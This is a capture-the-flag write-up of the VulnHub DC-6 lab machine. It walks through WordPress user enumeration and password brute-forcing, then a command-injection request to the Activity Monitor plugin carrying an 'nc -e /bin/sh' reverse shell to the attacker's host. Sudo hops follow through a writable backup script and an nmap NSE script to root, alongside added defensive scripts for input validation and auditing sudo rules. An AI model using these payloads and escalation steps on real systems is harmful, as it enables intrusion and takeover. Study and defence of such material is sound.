vulnhub-DC-6

Information Gathering

As usual, start with an nmap scan of the full port range.

└─# nmap -A -p1-65535 192.168.20.135
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 12:33 CST
Nmap scan report for 192.168.20.135
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
MAC Address: 00:0C:29:E1:2A:54 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.56 ms 192.168.20.135

Only 22 and 80 are open. Go look at port 80. Note the "Did not follow redirect to http://wordy/" line in the nmap output: the site redirects to the hostname wordy, so map 192.168.20.135 to wordy in your hosts file first (the DC-2 write-up covers how). It is a WordPress site, and on a box this simple that is an obvious hint that the way in is there. Following the DC-2 approach, enumerate usernames first.

wpscan --url http://wordy -e u


[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

Password Brute-Forcing

That gives five usernames; write them to user.txt. Passwords are another matter. In a real engagement you would not necessarily get this far, but here the author hints that the password is in rockyou.txt and contains the string k01, so a much smaller password list can be carved out of rockyou.

cat rockyou.txt | grep k01 > pass.txt

Then brute-force the login. For WordPress, wpscan is the most convenient tool for this.

wpscan --url http://wordy -U user.txt -P pass.txt 

[!] Valid Combinations Found:
| Username: mark, Password: helpdesk01

Log in to the dashboard with that account. As in DC-2, the dashboard does not redirect automatically after login, so browse to edit.php manually.
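The enumeration and wordlist steps above, as an added example that is not part of the original write-up: a small POSIX shell script that turns wpscan's user list and the "contains k01" hint into the user.txt and pass.txt that the wpscan -U/-P run expects. Both inputs are constructed stand-ins for the real wpscan output and rockyou.txt, and the usernames are taken only from the "[i] User(s) Identified:" section, because a real wpscan run also prints "[+] Headers ... | Found By:" blocks that a naive grep for "[+]" would pick up.

```sh
#!/bin/sh
# Added example, not part of the original write-up: build user.txt and pass.txt for
# the wpscan brute-force step from wpscan's enumeration output and the "contains k01"
# hint. Both inputs below are constructed stand-ins for real tool output and rockyou.txt.

# Constructed excerpt of `wpscan --url http://wordy -e u` output. Real runs also print
# "[+] Headers ... | Found By:" blocks above the user section, which must be skipped.
SAMPLE_WPSCAN='[+] URL: http://wordy/ [192.168.20.135]
[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Wp Json Api (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] admin
 | Found By: Login Error Messages (Aggressive Detection)'

# Constructed stand-in for rockyou.txt.
SAMPLE_ROCKYOU='password
helpdesk01
k01mark
summer2019
Desk01
help-k01'

# Read wpscan text on stdin; print one username per line, in first-seen order,
# taking only the "[+] name" lines after the "User(s) Identified" marker.
extract_wpscan_users() {
  awk '
    /User\(s\) Identified/                 { in_users = 1; next }
    in_users && /^\[\+\] / && !seen[$2]++  { print $2 }
  '
}

# Read a wordlist on stdin; keep lines containing the hint as a fixed string
# (case-sensitive, same as the grep in the write-up), dropping duplicates.
filter_passwords() {
  grep -F -- "$1" | awk '!seen[$0]++'
}

# Write the two files wpscan -U/-P expect into the given directory and report sizes.
build_wordlists() {
  dir=$1
  printf '%s\n' "$SAMPLE_WPSCAN" | extract_wpscan_users > "$dir/user.txt"
  printf '%s\n' "$SAMPLE_ROCKYOU" | filter_passwords k01 > "$dir/pass.txt"
  printf 'user.txt: %s entries, pass.txt: %s entries\n' \
    "$(wc -l < "$dir/user.txt")" "$(wc -l < "$dir/pass.txt")"
}

out=$(mktemp -d)
build_wordlists "$out"
# Next step on a real run: wpscan --url http://wordy -U "$out/user.txt" -P "$out/pass.txt"
rm -rf "$out"
```

On a real run, replace the two constructed strings with `wpscan ... -e u` output and the full rockyou.txt; a k01 filter over rockyou is only a few thousand lines, which is why the brute-force finishes quickly.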

Plugin Security (wordy)

The home page hints that plugin security matters, so the installed plugins are the place to look. The Activity Monitor plugin (page=plainview_activity_monitor, tab=activity_tools in the request path) has a lookup tool that hands the submitted ip field to a system command without sanitising it, so a pipe character in the value gets arbitrary command execution as the web server user.

The input field limits the value length on the client side only, so send the reverse-shell payload from Burp Suite, where the request can be edited freely.

POST /wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools HTTP/1.1
Host: wordy
Content-Length: 275
Cache-Control: max-age=0
Origin: http://wordy
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytUJOC69BDFc7z6m4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: wordpress_14014489b649086e51cacb340bafe656=mark%7C1732338496%7CiiKd8umIKTjn6vk3KpFFNNmA1ExFnk18EAaygqfqcgf%7C556aa13f6687d0e918de1bb5dd551ee18a55820d393ba51e08cd4710670688bb; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_14014489b649086e51cacb340bafe656=mark%7C1732338496%7CiiKd8umIKTjn6vk3KpFFNNmA1ExFnk18EAaygqfqcgf%7Cd5fab93259595116b0b92d15316e485e531a1449231fa71a15c6c10994e3dc6d; wp-settings-time-3=1732165860
Connection: close

------WebKitFormBoundarytUJOC69BDFc7z6m4
Content-Disposition: form-data; name="ip"

127.0.0.1|nc -e /bin/sh 192.168.20.129 1111
------WebKitFormBoundarytUJOC69BDFc7z6m4
Content-Disposition: form-data; name="lookup"

Lookup
------WebKitFormBoundarytUJOC69BDFc7z6m4--


Start the listener on the attacking machine (192.168.20.129, the address in the payload) before sending the request:

nc -lvnp 1111
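The injection in the lookup tool, as an added example that is neither the write-up's nor the plugin's code: a POSIX shell model of the vulnerable pattern next to a hardened version. `echo` stands in for whatever external lookup command the plugin runs (an assumption; the plugin's actual command is not shown on this page), and the form value arrives as `$1`. The fix is the same in any language: validate the value as an IPv4 address and pass it to the command as an argument rather than splicing it into a command string (in PHP, `escapeshellarg`).

```sh
#!/bin/sh
# Added example, not code from the write-up or from the plugin: a shell model of the
# injection in the plugin's IP lookup tool, next to a hardened version. `echo` stands in
# for the external lookup command; the user-supplied form value arrives as $1.

# Vulnerable pattern: the value is spliced into a command string that a shell then parses,
# so "127.0.0.1|nc -e /bin/sh 192.168.20.129 1111" becomes a pipeline and nc runs.
unsafe_lookup() {
  sh -c "echo $1"
}

# Strict IPv4 check: only digits and dots, no leading/trailing/double dots,
# exactly four non-empty octets, each 0-255.
is_ipv4() {
  addr=$1
  case $addr in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  old_ifs=$IFS
  IFS=.
  set -- $addr            # split on dots into positional parameters
  IFS=$old_ifs
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    [ -n "$octet" ] && [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Hardened pattern: validate first, then hand the value to the command as an argument
# (the PHP equivalent is escapeshellarg) so shell metacharacters are never interpreted.
safe_lookup() {
  is_ipv4 "$1" || { printf 'rejected: %s is not an IPv4 address\n' "$1" >&2; return 1; }
  sh -c 'echo "$1"' lookup "$1"
}

payload='127.0.0.1|tr . -'
unsafe_lookup "$payload"          # tr runs on echo's output: prints 127-0-0-1
safe_lookup "$payload" || true    # rejected before any command runs
safe_lookup 127.0.0.1             # prints 127.0.0.1
```

The demo payload uses `tr` instead of `nc` so that the effect is visible locally: the vulnerable function prints `127-0-0-1`, proving the second command in the pipeline ran; the hardened one refuses the value. Validation and argument passing are independent defences, and keeping both means a bug in one does not reopen the hole.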

Privilege Escalation

As usual, check sudo rights and SUID binaries first.

www-data@dc-6:/var/www/html/wp-admin$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping
www-data@dc-6:/var/www/html/wp-admin$ sudo -l
sudo -l

Nothing in the SUID list is unusual and www-data has no sudo entries, so it is time to hunt for clues on disk. The WordPress account was mark, so start with mark's home directory, where a to-do note hands over graham's password.

www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
cat things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

Log in over SSH as graham with that password and check sudo again.

graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh

graham may run jens's backup script as jens without a password. Look at what the script does.

graham@dc-6:~$ cat /home/jens/backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html

The script is writable by graham and sudo runs it as jens, so appending /bin/bash to it turns the backup rule into a jens shell.

graham@dc-6:~$ echo "/bin/bash" >> /home/jens/backups.sh

Remember to run it as jens with -u, exactly as the sudo rule allows.

graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
/home/jens/backups.sh: 2: /home/jens/backups.sh: B: not found
tar: Removing leading `/' from member names
whoami
jens@dc-6:~$ whoami
jens
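The graham-to-jens hop above is a generic sudo misconfiguration: a rule that points at a script the caller can modify is equivalent to handing the caller the target account. As an added example that is not part of the write-up, here is a POSIX shell audit that parses `sudo -l` output and reports every target that is writable, or sits in a writable directory. The sudo text is constructed to match the format seen on DC-6, and the demo file is created in a temporary directory; the function names are my own.

```sh
#!/bin/sh
# Added example, not from the write-up: audit `sudo -l` output for rules whose target
# the calling user can modify. "(jens) NOPASSWD: /home/jens/backups.sh" is worth exactly
# as much as the permissions on backups.sh and on the directory holding it. The sudo
# text below is constructed; the demo file is created in a temp directory.

tab=$(printf '\t')

# Constructed `sudo -l` output in the format seen on the box (paths are illustrative).
SAMPLE_SUDO='Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
    (root : root) NOPASSWD: /usr/bin/nmap, /usr/bin/id -u'

# Read `sudo -l` text on stdin; print "runas<TAB>executable" for every command entry.
sudo_targets() {
  awk '
    /^[ \t]*\(/ {
      runas = $0
      sub(/^[ \t]*\(/, "", runas); sub(/\).*/, "", runas)
      gsub(/[ \t]/, "", runas)                          # "root : root" -> "root:root"
      line = $0
      sub(/^[^)]*\)[ \t]*/, "", line)                   # drop "(runas) "
      gsub(/(NOPASSWD|PASSWD|SETENV|NOEXEC):[ \t]*/, "", line)
      n = split(line, cmds, /,[ \t]*/)
      for (i = 1; i <= n; i++) {
        split(cmds[i], parts, " ")                      # executable is the first word
        if (parts[1] != "") printf "%s\t%s\n", runas, parts[1]
      }
    }'
}

# Classify one target: WRITABLE if the file itself can be changed, DIR-WRITABLE if it
# can be replaced by writing to its directory, ok otherwise, REVIEW for non-path entries
# such as ALL. Caveat: run as root, every existing path tests writable.
classify_target() {
  path=$1
  case $path in
    /*) ;;
    *)  echo REVIEW; return ;;
  esac
  if [ -w "$path" ]; then
    echo WRITABLE
  elif [ -w "$(dirname "$path")" ]; then
    echo DIR-WRITABLE
  else
    echo ok
  fi
}

# Full report: "status<TAB>runas<TAB>path", one line per sudo target.
audit_sudo_targets() {
  sudo_targets | while IFS=$tab read -r runas path; do
    printf '%s\t%s\t%s\n' "$(classify_target "$path")" "$runas" "$path"
  done
}

# Demo: a backup script the sudo caller can write to, as graham could with backups.sh.
demo() {
  dir=$(mktemp -d)
  printf '#!/bin/bash\ntar -czf backups.tar.gz /var/www/html\n' > "$dir/backups.sh"
  chmod 0666 "$dir/backups.sh"
  printf '    (jens) NOPASSWD: %s\n    (root) NOPASSWD: /usr/bin/nmap\n' "$dir/backups.sh" \
    | audit_sudo_targets
  rm -rf "$dir"
}
demo
```

Run it on a live box with `sudo -l | audit_sudo_targets`. A WRITABLE or DIR-WRITABLE line is the DC-6 situation; an ok line still needs a look at GTFOBins, since the next hop on this box (nmap as root) is a target that is perfectly unwritable and still fatal.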

Check sudo once more as jens: nmap may be run as root.

Matching Defaults entries for jens on dc-6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
(root) NOPASSWD: /usr/bin/nmap

nmap Privilege Escalation

nmap's old --interactive mode is gone in this version (7.40), but NSE scripts run with nmap's own privileges, so a one-line Lua script that calls os.execute gives a root shell (the GTFOBins nmap technique):

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

jens@dc-6:~$ sudo nmap --script=$TF

Starting Nmap 7.40 ( https://nmap.org ) at 2024-11-21 15:35 AEST
NSE: Warning: Loading '/tmp/tmp.REhDsNkr5u' -- the recommended file extension is '.nse'.
# root
# root@dc-6:/home/jens# ls
backups.sh backups.tar.gz
root@dc-6:/home/jens# whoami
root
root@dc-6:/home/jens#

That is the box rooted.

Closing Thoughts

Familiar patterns throughout. The whole root path is a chain of sudo hops, so sudo misuse deserves attention on both sides: a sudo rule that points at a script the caller can write to is the same as giving away the target account, and a rule that allows a scriptable binary such as nmap as root is the same as giving away root. Takeaways: WordPress user enumeration, command injection in the plugin's IP lookup, and sudo-based privilege escalation.